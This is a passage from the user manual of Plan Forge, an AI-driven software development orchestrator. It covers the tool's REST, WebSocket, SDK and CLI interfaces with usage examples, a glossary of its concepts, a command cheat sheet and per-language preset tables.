forge_doctor_quorum)forge_drift_report)cost-anomaly detectorThe Yesterday's Digest dashboard tile is the same content, rendered in HTML. The CLI form is useful in a daily Slack post or as the body of a forge_notify_send message.
pforge digest --post at 09:00 every weekday with a Slack notifier configured (notify-slack extension) gives a free daily standup grounded in actual run data, not vibes.
| Path | Purpose | Rebuildable |
|---|---|---|
.forge/graph/snapshot.json |
Serialized graph index | Yes, pforge graph rebuild |
.forge/patterns-suppressions.json |
User-suppressed pattern findings + expiry | No (state) |
.forge/digests/YYYY-MM-DD.json |
Cached daily digest output | Yes, pforge digest --rebuild |
.forge/runs/, .forge/trajectories/, .forge/bugs/, .forge/cost/ |
Source logs (graph is derived from these) | Authoritative |
pforge graph stats # node/edge counts, last-rebuild timestamp
pforge graph rebuild # full rebuild from logs
pforge graph query hot-files # run a canned query
pforge patterns # list current findings from all four detectors
pforge patterns --since=7d
pforge digest # the morning summary
pforge digest --post # send via configured notifier
MCP is the native transport for Copilot and similar agents, but it is not the only one. Plan Forge ships four orthogonal surfaces so any tool can drive the workshop: REST for HTTP-anything, SDK for Node.js callers, WebSocket hub for live event streams, and CLI for scripts and humans.
pforge-sdk, /tools, /hallmark, /chunker), and 97 CLI commands. The same underlying handlers back every surface, pick the one that fits the caller, not the feature.
The same handler set lives behind all four surfaces. Adding a new tool means the team writes one handler, and it automatically becomes available as MCP tool, REST endpoint, CLI command, and SDK export. This is intentional: the integration surface should never be the bottleneck for a new capability.
The REST surface is the right choice for any caller that already speaks HTTP, GitHub Actions, GitLab CI, a Python script, a curl one-liner, a Postman collection. It is also the surface the dashboard itself uses.
# Local dev (default)
http://localhost:3100/api
# Auth: bearer token from .forge/secrets.json (key: "apiToken")
curl -H "Authorization: Bearer $PFORGE_API_TOKEN" \
http://localhost:3100/api/plan/status
Tokens are generated by pforge auth issue and stored locally in .forge/secrets.json (gitignored). Multi-developer setups use one token per developer; CI uses a dedicated CI token with scoped permissions.
The 113 endpoints organize into 16 subsystems that mirror the MCP tool families. The full per-endpoint reference lives in Appendix W — REST API Reference; this chapter covers the shape:
| Prefix | Backs | Sample endpoint |
|---|---|---|
/api/plan |
Plan execution + status | POST /api/plan/run |
/api/cost |
Cost reports + estimates | GET /api/cost/report |
/api/team |
Team dashboard + activity | GET /api/team/dashboard |
/api/copilot-instructions |
Copilot trilogy | POST /api/copilot-instructions/sync |
/api/graph |
Knowledge graph queries | POST /api/graph/query |
/api/liveguard |
Deploy safety surface | POST /api/liveguard/run |
/api/bugs |
Bug registry | GET /api/bugs |
/api/crucible |
Idea smelting | POST /api/crucible/ask |
/api/forge-master |
Read-only reasoning agent | POST /api/forge-master/ask |
/api/hub |
WebSocket event stream (see next section) | WS /api/hub |
Every endpoint returns RFC 7807 ProblemDetails on error and a structured JSON object on success. The OpenAPI spec lives at GET /api/openapi.json if you need codegen.
/api/hubThe WebSocket hub is a broadcast channel that emits every event the orchestrator generates, plan starts, slice transitions, gate results, cost samples, bug filings, drift updates. It is the substrate the dashboard's live tiles render off.
// Node.js
import { WebSocket } from "ws";
const ws = new WebSocket("ws://localhost:3100/api/hub", {
headers: { Authorization: `Bearer ${process.env.PFORGE_API_TOKEN}` }
});
ws.on("message", (raw) => {
const event = JSON.parse(raw.toString());
console.log(event.type, event.payload);
});
{
"type": "slice.commit", // canonical event name
"ts": "2026-05-17T09:18:41Z",
"actor": "alice@example.com",
"plan": "Phase-31",
"slice": "2",
"payload": { sha: "e4f5g6h", durationMs: 24100, gates: ["pass","pass"] }
}
The full event catalog, 38 event types across eight families with envelope, source/security_risk enums, payloads, and retention, lives in Appendix V — Event Catalog. The canonical JSON schema lives in pforge-mcp/EVENTS.md. Subscribe to all events or filter by type:
ws.send(JSON.stringify({
subscribe: ["slice.*", "gate.fail", "bug.opened"]
}));
/dashboard route is built on top of this WebSocket. If you want to embed Plan Forge progress into your own ops portal, point a WebSocket client at /api/hub, filter to the event types you care about, render. Zero polling.
pforge-sdk — the Node.js clientFor TypeScript / JavaScript callers, pforge-sdk is a thin wrapper over the REST and WebSocket surfaces with typed responses and bundled helpers. It ships with four entry points:
| Import | Contains |
|---|---|
pforge-sdk |
Core client, createClient({ baseUrl, token }), all REST methods, WebSocket subscriber |
pforge-sdk/tools |
Typed wrappers for every MCP tool, call any forge_* tool from Node.js |
pforge-sdk/hallmark |
Hallmark stamp helpers, sign / verify generated artifacts |
pforge-sdk/chunker |
Plan-chunker, split long plans into Scope-Contract-aligned slices for execution |
import { createClient } from "pforge-sdk";
import { forgeRunPlan, forgeEstimateQuorum } from "pforge-sdk/tools";
const client = createClient({
baseUrl: "http://localhost:3100",
token: process.env.PFORGE_API_TOKEN
});
// Estimate before running (cost discipline, never hand-compute)
const est = await forgeEstimateQuorum(client, { plan: "docs/plans/Phase-31-PLAN.md" });
console.log("Cheapest mode:", est.recommendation);
// Execute
const run = await forgeRunPlan(client, {
plan: "docs/plans/Phase-31-PLAN.md",
quorum: est.recommendation
});
// Subscribe to live events for this run
const sub = client.subscribe(["slice.*", "gate.*", "plan.complete"]);
for await (const event of sub) {
if (event.plan !== "Phase-31") continue;
console.log(event.type, event.payload);
if (event.type === "plan.complete") break;
}
The CLI is the right surface for ad-hoc scripts, cron jobs, and direct human use. Every command has a --json flag for machine-readable output, so it composes cleanly with shell pipelines and CI scripts.
# Run a plan and pipe the result into jq
pforge run-plan docs/plans/Phase-31-PLAN.md --json | jq '.cost.totalUsd'
# Loop until a plan completes (useful in CI)
while [ "$(pforge plan-status --json | jq -r '.state')" != "complete" ]; do
sleep 30
done
# Daily digest into Slack
pforge digest --post
# Cost rollup for the month
pforge cost-report --since=30d --json | jq '.byModel'
The full 97-command reference lives in Chapter 8 — CLI Reference. The pforge --help output is the canonical source.
| Caller | Use | Why |
|---|---|---|
| GitHub Copilot / Claude / Cursor / Codex | MCP | Native transport; auto-discovered tools |
| GitHub Actions / GitLab CI / Jenkins | REST + CLI | Already speak HTTP and shell; no MCP transport in CI |
| Custom dashboard / status page | REST (initial) + WebSocket (live) | Snapshot on load, live updates after |
| Node.js script / automation | SDK | Typed responses; no transport boilerplate |
| cron job / one-shot batch | CLI | --json pipes cleanly; no long-running process |
| Mobile / web app / Slack bot | REST + WebSocket | Cross-platform; no Node.js requirement |
All four surfaces share the same auth model:
Authorization header (REST + WebSocket) or as PFORGE_API_TOKEN env var (CLI + SDK).pforge auth issue [--scope=…] and stored in .forge/secrets.json (gitignored)..forge/secrets.json under providers.* or in environment variables. Never in code, never in committed config.
Every Plan Forge term defined.
Auto-generated from capabilities.mjs glossary, hand-edited for clarity.
If you're new to Plan Forge, these five terms cover 80% of the manual. They build on each other in this order:
docs/plans/ that describes one feature. The unit of work Plan Forge operates on.
dotnet test) that must pass before the next slice runs. Gates are how Plan Forge knows the AI didn't break anything.
Read those five and you can follow the rest of the manual without backtracking. The full alphabetical reference begins below, organized by topic.
| Term | Definition |
|---|---|
| Plan Forge | The AI-Native SDLC Forge Shop. One workshop with four stations, Smelt, Forge, Guard, Learn, connected by gates, telemetry, and persistent memory. Covers every phase of the software lifecycle. |
| Forge | Shorthand for Plan Forge. Also: .forge/ directory (project data), .forge.json (config). |
| Plan | A Markdown file in docs/plans/ describing a feature. Contains slices, scope contract, and gates. |
| Hardened Plan | A plan that passed Step 2, locked-down execution contract with scope, slices, gates, forbidden actions. |
| Scope Contract | Plan section defining In Scope, Out of Scope, and Forbidden files. Prevents scope creep. |
| Slice | A 30–120 minute unit of execution within a plan. Has tasks, a validation gate, and optional dependencies. Commit-sized: small enough to catch failures early, large enough to be useful. |
| Validation Gate | Build + test commands that must pass at every slice boundary before proceeding. |
| Forbidden Actions | Files or operations the AI must not touch. Enforced by lifecycle hooks and scope checks. |
| Stop Condition | A condition that halts execution, e.g., "If migration fails, STOP." |
| Guardrails | Instruction files that auto-load based on the file being edited. 15–18 per preset. |
| Preset | Stack-specific configuration (dotnet, typescript, python, etc.). Determines which files are installed. |
| Extension | Community add-on providing instructions, agents, or prompts for a specific domain. |
| Self-Deterministic Agent Loop | The v2.58 system-wide model: the deterministic slice executor plus ten opt-in inner-loop subsystems (reflexion, trajectories, auto-skills, gate synthesis, postmortems, federation, reviewer, competitive execution, auto-fix, cost-anomaly). Execution stays reproducible; loop context improves each pass. See the canonical overview. |
| Phase | Versioned chunk of Plan Forge development. Plans live at docs/plans/Phase-N-PLAN.md. A phase contains 1+ plans; each plan contains 1+ slices. Numbering is monotonic across the project (Phase-28.2, Phase-31, etc.). |
| Tempering | Post-execution coverage & quality subsystem. Scans the diff with pluggable scanners (typecheck, lint, content-audit, secret-scan), classifies findings into real-bug / flaky / noise lanes, and feeds the Bug Registry. Distinct from LiveGuard (runtime defense) and the Reviewer Gate (architectural review). 5 MCP tools: forge_tempering_run/scan/status/drain/approve_baseline. |
| Skill | A multi-step procedure invoked from chat via a /slash-command (e.g. /code-review, /staging-deploy, /health-check). Defined as SKILL.md files under .github/skills/. Runs through forge_run_skill with its own validation gates. |
| Project Principles | Project-level guardrails generated by .github/prompts/project-principles.prompt.md and stored in docs/plans/PROJECT-PRINCIPLES.md. Auto-load via project-principles.instructions.md when the file exists. Define forbidden patterns, technology commitments, and architectural boundaries. |
| AI Plan Hardening Runbook | The canonical 7-step pipeline every plan flows through (Specify → Preflight → Harden → Execute → Sweep → Review → Ship). Master copy: docs/plans/AI-Plan-Hardening-Runbook.md. |
The Forge Shop's organizing taxonomy, every Plan Forge feature lives at one of these four stations.
| Term | Definition |
|---|---|
| Forge Shop | The whole workshop. The collective name for the four stations and the connective tissue (gates, telemetry, memory) that ties them together. |
| Station | One of the four phase-specific zones in the Forge Shop. Each station has its own tools, agents, artifacts, and gate to the next station. |
| Act | The Manual's organizational unit. Each Act covers one station's chapters. Act I = Smelt (Ch 1–5), Act II = Forge (Ch 6–15), Act III = Guard (Ch 16–20), Act IV = Learn (Ch 21–24). |
| 🪨 Smelt | Station 1, Intake → Scope Contract. Where rough ideas become hardened plans the Forge can execute. Houses the Specifier agent, the AI Plan Hardening Runbook, the Crucible, and Project Principles. |
| 🔨 Forge (station) | Station 2, Scope Contract → shipped code. Where slices are struck against the anvil. Houses pforge run-plan, slice gates, quorum mode, auto-escalation, and the cost ledger. |
| 🛡️ Guard | Station 3, Post-deploy defense. The watchtower. Houses LiveGuard (secret scan, drift, regression guard, env diff, incident capture), the Watcher, and the Remote Bridge. |
| 🧠 Learn | Station 4, Memory and retrospectives. The brain above the bench. Houses OpenBrain, the Bug Registry, the Testbed, Health DNA, and Forge Intelligence. |
| Watcher | Tool (forge_watch, forge_watch_live) that tails another project's pforge run from a separate VS Code session. Read-only by contract, cannot modify the target. |
| Remote Bridge | Notification dispatcher that forwards hub events to Telegram, Slack, Discord, OpenClaw, or a generic webhook. Used for phone-friendly progress updates and approval prompts. |
| Bug Registry | Closed-loop scanner-bug tracker. Four tools, forge_bug_register, forge_bug_list, forge_bug_update_status, forge_bug_validate_fix. Records live in .forge/bugs/<bugId>.json. |
| Bug Fingerprint | Hash of scanner name + test name + assertion message + normalized stack trace. Re-registering a duplicate fingerprint returns DUPLICATE_BUG with the existing bugId. |
| Bug Status | State machine: open → in-fix → validating → fixed, with side branches to wont-fix, duplicate, and noise. Illegal transitions return INVALID_TRANSITION. |
| Bug Classifier | Heuristic that labels evidence as real-bug (persisted), flaky (ignored), or noise (discarded). Only real-bug writes to .forge/bugs/. |
| Testbed | Tool (forge_testbed_run) that replays scenario fixtures against a dedicated repo. Scenarios in docs/plans/testbed-scenarios/*.json; findings in docs/plans/testbed-findings/*.json. Feeds the Bug Registry and Health DNA. |
| Crucible | Smelt-station idea funnel for community extensions. Lifecycle: Submitted → Crystallized → Tempered → Hardened. Stalled Crystallized ideas surface as Watcher anomalies. |
| Term | Definition |
|---|---|
| Pipeline | The 7-step process: Specify → Preflight → Harden → Execute → Sweep → Review → Ship. |
| Step 0 (Specify) | Define what and why, structured specification with acceptance criteria. |
| Step 2 (Harden) | Convert spec into binding execution contract with slices, gates, and scope. |
| Step 3 (Execute) | Build code slice-by-slice. Can be automated or manual. |
| Step 5 (Review Gate) | Independent audit session, checks for drift, scope violations, and quality. |
| Step 1 (Preflight) | Verifies prerequisites before plan execution, git clean, build green, environment vars set. Ships as a prompt (.github/prompts/step1-preflight-check.prompt.md), not a separate agent persona. |
| Specifier | Step 0 agent persona that turns a one-line idea into a structured specification with acceptance criteria. Lives at .github/agents/specifier.agent.md. |
| Plan Hardener | Step 2 agent/runbook that converts a draft plan into a Hardened Plan by adding scope contract, validation gates, forbidden actions, and rollback. Lives at .github/prompts/step2-harden-plan.prompt.md. |
| Reviewer Gate | Step 5 agent persona that runs in a fresh session, reads the plan's Scope Contract, and audits the diff for drift and quality. Distinct from LiveGuard (runtime layer). Can be delegated to GitHub Copilot cloud agent via forge_delegate_review. |
| Shipper | Step 6 agent persona for commit, push, deploy, and close. Lives at .github/agents/shipper.agent.md. |
| Runbook (tool) | The forge_runbook MCP tool that exposes the AI Plan Hardening Runbook as a callable surface, agents can request the canonical step list, gate templates, and prompt URIs without re-reading the Markdown source. |
| Runbook | Bare term, in Plan Forge always refers to the AI Plan Hardening Runbook (the document) or the forge_runbook tool that exposes it. See both entries for specifics. |
| applyTo | Frontmatter field in instruction files that controls which files trigger auto-loading. Uses glob patterns (e.g., ** for all files, *.cs for C# only). |
| Term | Definition |
|---|---|
| Full Auto | Mode where gh copilot CLI runs each slice automatically. No human intervention. |
| Assisted | Mode where human codes in VS Code; orchestrator validates gates between slices. |
| Worker | The CLI process executing a slice, gh copilot, claude, or codex. |
| DAG | Directed Acyclic Graph, the dependency graph of slices determining execution order. |
| [P] tag | Parallel-safe marker on a slice header. Enables concurrent execution. |
| [depends: Slice N] | Dependency marker. Slice waits for N to complete before starting. |
| Quorum Mode | Multi-model consensus on slice execution: 3+ models analyze a slice independently, reviewer synthesizes best approach. Auto-winner. CLI: --quorum=auto/power/speed/false. |
| Quorum Auto | Threshold-based: only slices scoring above the complexity threshold use quorum. |
| Quorum Power | Multi-model consensus using flagship models (highest quality, highest cost). Complexity threshold 5. CLI: --quorum=power. |
| Quorum Speed | Multi-model consensus using fast models (lower quality, lower cost). Complexity threshold 7. CLI: --quorum=speed. |
| Quorum Advisory | Multi-model consensus on Forge-Master prompts (not slices). Returns all replies + dissent summary; human picks the reply. Configured via forgeMaster.quorumAdvisory: "off" | "auto" | "always". Hard-blocked on operational, troubleshoot, build lanes. |
| Complexity Score | 1–10 rating based on file scope, dependencies, security keywords, gate count, historical failure rate. |
| Escalation Chain | Model failover order: if Model A fails, try B, then C. |
| Forge-Master | Read-only reasoning orchestrator with three-stage intent classifier (keyword → embedding cache → router LLM). Lives at forge_master_ask + Studio dashboard tab. Phase-28 MVP, subsequently expanded with quorum advisory and unified timeline. |
| Forge-Master Observer | Background hub subscriber (pforge-master/src/observer-loop.mjs) that batches live Plan Forge events and narrates notable patterns in plain prose via the reasoning loop. Mute-by-default: enable with forgeMaster.observer.enabled: true. Budget-capped via maxUsdPerDay and maxNarrationsPerHour. Started with pforge master observe --start [--detach] or the forge_master_observe MCP tool. |
| Cross-Run Watcher | Watcher mode (runWatch({ mode: "cross-run" })) that aggregates .forge/runs/*/summary.json across multiple completed runs into a health snapshot. Detects recurring gate failures, retry-rate spikes, cost anomaly trends, and slice-timeout clusters. Feeds the A4 plan-health auditor agent when triggered by hooks.postRun.invokeAuditor. |
| Auditor Auto-Invoke | PostRun hook behavior (hooks.postRun.invokeAuditor) that automatically triggers the A4 plan-health auditor on run failure (onFailure: true) or every N completed runs (everyNRuns: N). The auditor report is written to .forge/health/latest.md. See forge-json-reference § hooks.postRun. |
| Embedding Cache | Stage 1.5 of the Forge-Master intent classifier. Cosine-similarity match (≥ 0.85) against previously-classified prompts. Zero API cost on hit, works fully offline once warm. 500-entry LRU. |
| CRITICAL_FIELDS | The six fields the Crucible critical-fields gate requires before finalizing: build-command, test-command, scope, validation-gates, forbidden-actions, rollback. Added v2.82.1. |
| Host-Aware Routing | Routing preference that detects the IDE/CLI host (VS Code, Claude Code, Cursor, Windsurf, Zed, CLI) and chooses CLI proxy vs direct API to honor whichever subscription the user is paying for. Modes: auto / gh-copilot / direct-api / drop. |
| DIRECT_API_ONLY | Routing class for models with no CLI proxy: grok-*, dall-e-*. Always require an API key (XAI_API_KEY / OPENAI_API_KEY). |
| COPILOT_SERVABLE | Routing class for gpt-* / chatgpt-* models. gh-copilot can proxy them via your Copilot subscription; direct API is fallback if OPENAI_API_KEY is set. |
| Term | Definition |
|---|---|
| Smith | Diagnostic tool (pforge smith). Inspects environment, setup, version. Named after a blacksmith. |
| Sweep | Completeness scan (pforge sweep). Finds TODO/FIXME/stub markers. |
| Analyze | Consistency scoring (pforge analyze). Scores 0–100 across 4 dimensions. |
| Orchestrator | Execution engine. Parses plans, schedules slices, spawns workers, validates gates. |
| Hub | WebSocket event server. Broadcasts slice events to connected clients in real-time. |
| Dashboard | Web UI at localhost:3100/dashboard. 25 tabs for monitoring, cost, replay, skills, config, watcher, and LiveGuard. |
| Lifecycle Hook | Automatic actions tied to Plan Forge's pipeline: PreDeploy, PreCommit, PreAgentHandoff, PostSlice (configured via .github/hooks/plan-forge.json). Distinct from Claude Code's own hook names. |
| OpenBrain | The L3 memory layer. Self-hosted MCP server (PostgreSQL + pgvector) that provides cross-session, cross-tool semantic memory. Plan Forge ships with L1 (Hub) + L2 (.forge/*.jsonl) memory built-in; L3 requires OpenBrain. Without it, Reflexion lessons, Auto-skills, cross-project Federation, and 28 auto-capturing tools become inert. Recommended at install time; easy to add later via pforge brain hint. Deploy options: Docker, Supabase, Kubernetes, Azure. See srnichols.github.io/OpenBrain. |
| MCP | Model Context Protocol. A standard for AI agents to call functions. Plan Forge's MCP server exposes 102 tools (core + LiveGuard + Watcher + Crucible + Tempering + Bug Registry + Testbed + Forge-Master). |
| ACI | Agent-Computer Interface. The SWE-agent principle that an agent only performs as well as the surface lets it: bounded payloads, sparse fields, paginated lists, friendly empty-result messages. Enforced in Plan Forge via tool-surface temper guards in architecture-principles.instructions.md. forge_search is the reference standard. |
| Bridge | Notification dispatcher that forwards WebSocket hub events to external platforms (Slack, Discord, Telegram, generic webhooks). |
| Knowledge Graph | In-memory graph of Phase / Slice / Commit / File / Run / Bug nodes, queryable via forge_graph_query. Used by Forge-Master for cross-feature reasoning. See Chapter 28. |
| Cost Ledger | Aggregated token + dollar history across runs (.forge/cost-history.json). Powers forge_cost_report, anomaly detection, and the cost dashboard tab. |
| Worktree | Git worktree feature used by Plan Forge so multiple developers can run plans on the same repo without colliding. Each worktree gets its own .forge/ directory and a row in the shared team-activity ledger. |
| Discovery Harness | 4-pass build sequence (Harness → Wrapper → Execute → Auto-smelt) that crawls a running app, converts findings to Crucible smelts, runs slices with Tempering, and re-smelts failures into new bugs. |
| Spec Kit Interop | Bridge that imports GitHub Spec Kit projects via forge_crucible_import using deterministic field mapping (no LLM call). Spec Kit specs become Crucible smelts. |
| Foundry | Microsoft Foundry, the external Azure-hosted agent platform Plan Forge integrates with. Provides Foundry Toolboxes (MCP-compatible tool bundles), Foundry Agent Service (hosted agent runtime), and Foundry App Insights (OTel sink). See foundry-quota.mjs and the microsoft-foundry skill. |
| Lattice | v2.95 code-graph engine. Semantic chunk index plus BFS call-graph traversal for any git repository. Produces .forge/lattice/chunks.jsonl and edges.jsonl. Pure-JS chunker with optional tree-sitter upgrade. Five MCP tools: index / stat / query / callers / blast. CLI: pforge lattice. |
| Anvil | Δ-only memoization layer for the Lattice. Caches expensive analyses (chunk extraction, embedding lookups, gate replays) keyed by content hash; only recomputes the delta when source changes. CLI: pforge anvil stat / purge. Hit rate is reported by forge_lattice_stat. |
| Triage | Plan Forge's noise-vs-signal classifier surface. Two tools: forge_alert_triage (groups and prioritizes open LiveGuard alerts) and forge_triage_route (routes a finding to a lane, real-bug, flaky, noise, or human-review). CLI: pforge triage. |
| Timeline | Chronological event view exposed via forge_timeline, merges run events, gate results, commits, and incidents on a single axis for the current phase or slice. |
| Home Snapshot | Bounded activity overview returned by forge_home_snapshot. Pagination-friendly summary of recent runs, open bugs, drift score, and active plans, the default landing payload for Forge-Master and the Studio home tab. |
| Image Generation | Image synthesis surface (forge_generate_image) that proxies DALL-E / image models for chapter heroes, diagrams, and marketing assets. DIRECT_API_ONLY, requires OPENAI_API_KEY. |
| GitHub Metrics | Subsystem (github-metrics.mjs) that ingests PR / issue / commit metrics from the GitHub REST API and feeds them into Health DNA and Forge Intelligence. Paired with github-introspect.mjs for repo-shape introspection. |
Plan Forge nests four named loops inside its outer Self-Deterministic Agent Loop. Each loop has its own canonical chapter, entries below are the one-line cards.
| Term | Definition |
|---|---|
| Inner Loop | The slice-level reasoning loop composed of the ten inner-loop subsystems (reflexion, trajectories, auto-skills, gate synthesis, postmortems, federation, reviewer, competitive execution, auto-fix, cost anomaly). Wraps every slice attempt. See Inner Loop deep dive. |
| Competitive Loop | Multi-model race pattern within slice execution. Two or more workers attempt the same slice in parallel; the orchestrator validates each and ships the winner. See Competitive Loop deep dive. |
| Audit Loop | Closed-loop bug discovery from a running system. Content-audit scanner → triage → drain cycle iterates until convergence. Default off; opt-in via .forge.json#audit.mode. Production environments hard-blocked. See Audit Loop deep dive. |
| Self-Deterministic Loop | Alias for Self-Deterministic Agent Loop. The system-wide outer loop that wraps the deterministic slice executor with all inner-loop subsystems. |
The ten opt-in subsystems that compose the Inner Loop. Each is independently configurable; the Reviewer subsystem reuses the Step 5 Reviewer Gate agent persona (see Pipeline).
| Term | Definition |
|---|---|
| Reflexion | Re-analyzes a failed slice attempt to extract a lesson learned; the lesson is persisted to memory and injected into the next attempt's context. |
| Trajectory | Captured record of a slice attempt (prompts, tool calls, gates passed/failed, model used, duration). Stored in .forge/trajectories/. The Inner Loop replays trajectories to learn from past runs. |
| Auto-skill | Auto-promotes a successful prompt pattern into a reusable Skill after 3+ uses. Generated skill lands at .github/skills/<name>/SKILL.md for human review. |
| Gate Synthesis | Proposes new validation gates based on observed slice failures. If three runs of the same plan fail at the same regression, Gate Synthesis suggests a gate that would have caught it. |
| Postmortem | Auto-generated retrospective after a failed run, written to .forge/postmortems/. Includes timeline, root cause hypothesis, and a fix proposal. |
| Federation | Cross-project intelligence sharing via OpenBrain. One project's lesson learned becomes another project's preflight check or postmortem hint. |
| Competitive Execution | Inner-loop flavor of the Competitive Loop, two models race on the same slice; first valid result wins. Cost-bounded by escalation chain policy. |
| Auto-fix | Proposes a 1–2 slice fix plan when a gate fails. Stored in docs/plans/auto/. Distinct from LiveGuard's Fix Proposal (which fires on post-deploy drift, not slice-time gate failure). |
| Cost Anomaly | Flags slices whose token cost is >2σ above their historical baseline. Triggers escalation chain review or quorum threshold adjustment. |
| Term | Definition |
|---|---|
| Drift Score | Numeric score (0–100) measuring how closely code follows architecture guardrails. Lower = more violations. |
| Fix Proposal | Auto-generated 1–2 slice plan from LiveGuard findings. Stored in docs/plans/auto/. |
| LiveGuard | Post-coding operational intelligence layer. 14 MCP tools for drift, incidents, deploys, secrets, dependencies, and composite health checks. |
| MTTR | Mean Time To Resolve. Computed from incident capture to resolvedAt timestamp. |
| Secret Scan | Entropy-based scan of recent commits for potential hardcoded credentials. |
| OpenClaw | Optional external analytics service. Receives LiveGuard snapshots via POST for cross-project health monitoring. |
| Health DNA | Composite project health fingerprint: drift avg, incident rate, test pass rate, model success rate, cost per slice. Persisted to .forge/health-dna.json. Used for cross-session decay detection. |
| Forge Intelligence | Build-time self-improvement: auto-tuning escalation chains, cost calibration, adaptive quorum thresholds, slice splitting advisories. The forge gets smarter every run. |
| Recurring Incident | When 3+ incidents hit the same files in 30 days, LiveGuard auto-escalates severity and marks the pattern as systemic. |
| Deploy Journal | Append-only deploy history exposed via forge_deploy_journal. Each entry records environment, commit, slice range, gates passed, and outcome, the source of truth for "what shipped when" and the basis for rollback decisions. |
| Term | Definition |
|---|---|
| PreCommit Chain | Ordered list of validation scripts declared in hooks.preCommit.chain[] that run before every slice commit. |
| Diff Classifier | The forge_diff_classify MCP tool that scans staged git diffs for security and quality issues. |
| Plan Lock Hash | SHA-256 hash stored in lockHash frontmatter; the orchestrator refuses to run if the plan body has drifted. |
| Tool Denylist | The tools.deny frontmatter field that strips listed MCP tools from the worker's session. |
| Network Allowlist | The network.allowed frontmatter field listing permitted hosts for outbound connections (currently log-only). |
| Term | Definition |
|---|---|
| Run | A single plan execution. Creates .forge/runs/<timestamp>/ with results and traces. |
| Trace | OTLP-compatible JSON recording the full execution with spans, events, and timing. |
| OTLP | OpenTelemetry Protocol, the standard format for distributed traces. Plan Forge traces are OTLP-compatible and can be exported to Jaeger, Grafana Tempo, or any collector. |
| Span | A timed unit within a trace, run (root), slice (child), gate (grandchild). |
| Cost History | .forge/cost-history.json, aggregate token/cost data across all runs. |
| Index | .forge/runs/index.jsonl, append-only run registry for instant lookup. |
| SARIF | Static Analysis Results Interchange Format, the OASIS standard JSON schema CI scanners (CodeQL, Semgrep, ESLint, etc.) emit. Plan Forge converts SARIF files into hardenable plans via sarif-to-plan.mjs, turning third-party findings into Crucible smelts. |
Printable cheat sheet. Ctrl+P for a clean print.
| Command | Description |
|---|---|
pforge init | Bootstrap project with setup wizard |
pforge check | Validate setup files |
pforge smith | Diagnose environment + setup health |
pforge status | Show phase status from roadmap |
pforge new-phase <name> | Create new phase plan + roadmap entry |
pforge branch <plan> | Create git branch from plan |
pforge commit <plan> <slice> | Auto-generate conventional commit |
pforge phase-status <plan> <status> | Update phase status in roadmap |
pforge sweep | Scan for TODO/FIXME markers |
pforge diff <plan> | Compare changes vs scope contract |
pforge analyze <plan> | Consistency scoring (0–100) |
forge_diagnose({ file }) (MCP tool) | Multi-model bug investigation |
pforge run-plan <plan> | Execute plan (auto/assisted/estimate) |
pforge audit-loop [--auto] | Run closed-loop drain. Off by default; opt-in via .forge.json#audit. |
pforge timeline [--source X --window 24h] | Unified chronological view across 9 sources |
pforge ext search|add|list|remove | Extension management |
pforge update | Update framework files |
pforge help | Show all commands |
pforge tour | Interactive guided walkthrough |
| Command | Description |
|---|---|
pforge drift | Score codebase against guardrails |
pforge incident <desc> | Capture an incident |
pforge triage | Rank open alerts |
pforge dep-watch | Scan dependency vulnerabilities |
pforge secret-scan | Scan for hardcoded secrets |
pforge health-trend | Health score over time |
| Step | Name | Session | Agent |
|---|---|---|---|
| 0 | Specify | 1 | specifier |
| 1 | Pre-flight | 1 | — |
| 2 | Harden | 1 | plan-hardener |
| 3 | Execute | 2 | executor |
| 4 | Sweep | 2 | — |
| 5 | Review | 3 | reviewer-gate |
| 6 | Ship | 4 | shipper |
| File | Purpose |
|---|---|
.forge.json | Project config (preset, models, escalation, quorum) |
.github/copilot-instructions.md | Master config, loads every session |
.github/instructions/*.instructions.md | Auto-loading guardrails (15–18 files) |
.github/agents/*.agent.md | Reviewer agents (19 total) |
.github/prompts/step*.prompt.md | Pipeline prompt templates |
.github/skills/*/SKILL.md | Slash command skills (13 total) |
.github/hooks/ | Lifecycle hooks (4 files) |
docs/plans/DEPLOYMENT-ROADMAP.md | Phase tracker |
docs/plans/PROJECT-PRINCIPLES.md | Non-negotiable commitments |
.forge/runs/ | Execution history, traces, logs |
.forge/cost-history.json | Aggregate cost data |
| Port | URL | Purpose |
|---|---|---|
| 3100 | localhost:3100/dashboard | Dashboard UI + REST API |
| 3100 | localhost:3100/ui | Read-only plan browser |
| 3101 | ws://localhost:3101 | WebSocket real-time events |
| Flag | Command | Effect |
|---|---|---|
--estimate | run-plan | Cost prediction only |
--assisted | run-plan | Human codes, orchestrator validates |
--resume-from N | run-plan | Skip completed slices |
--quorum | run-plan | Multi-model consensus |
--dry-run | most commands | Preview without executing |
-Agent all | init/setup | Generate files for all AI tools |

Per-preset differences at a glance.
All presets share 4 universal instruction files, 8 cross-stack agents, and 6 pipeline agents. This appendix shows what's different per preset.
dotnet)| Property | Value |
|---|---|
| Build | dotnet build |
| Test | dotnet test |
| Framework | ASP.NET Core, Blazor, Dapper/EF Core |
| Testing | xUnit, NSubstitute, FluentAssertions |
| Unique files | graphql.instructions.md, dapr.instructions.md |
| Example plan | Phase-DOTNET-EXAMPLE.md |
| Detection | *.csproj or *.sln in root |
typescript)| Property | Value |
|---|---|
| Build | npm run build / tsc |
| Test | npm test / vitest |
| Framework | Express, Fastify, Next.js |
| Testing | Vitest, Jest, Supertest |
| Unique files | frontend.instructions.md (React/Vue patterns) |
| Example plan | Phase-TYPESCRIPT-EXAMPLE.md |
| Detection | tsconfig.json or package.json in root |
python)| Property | Value |
|---|---|
| Build | python -m py_compile |
| Test | pytest |
| Framework | FastAPI, Django, Flask |
| Testing | Pytest, pytest-asyncio, httpx |
| Unique files | — |
| Example plan | Phase-PYTHON-EXAMPLE.md |
| Detection | requirements.txt, pyproject.toml, or setup.py |
java)| Property | Value |
|---|---|
| Build | mvn compile / gradle build |
| Test | mvn test / gradle test |
| Framework | Spring Boot, JPA, Hibernate |
| Testing | JUnit 5, Mockito, AssertJ |
| Unique files | — |
| Example plan | Phase-JAVA-EXAMPLE.md |
| Detection | pom.xml or build.gradle |
go)| Property | Value |
|---|---|
| Build | go build ./... |
| Test | go test ./... |
| Framework | Standard library, Chi router, Cobra CLI |
| Testing | testing package, testify |
| Unique files | — |
| Example plan | Phase-GO-EXAMPLE.md |
| Detection | go.mod in root |
swift)| Property | Value |
|---|---|
| Build | swift build / xcodebuild |
| Test | swift test |
| Framework | SwiftUI, Vapor, Fluent |
| Testing | XCTest |
| Unique files | — |
| Example plan | Phase-SWIFT-EXAMPLE.md |
| Detection | Package.swift or *.xcodeproj |
rust)| Property | Value |
|---|---|
| Build | cargo build |
| Test | cargo test |
| Framework | Tokio, Axum, sqlx |
| Testing | Cargo test, proptest |
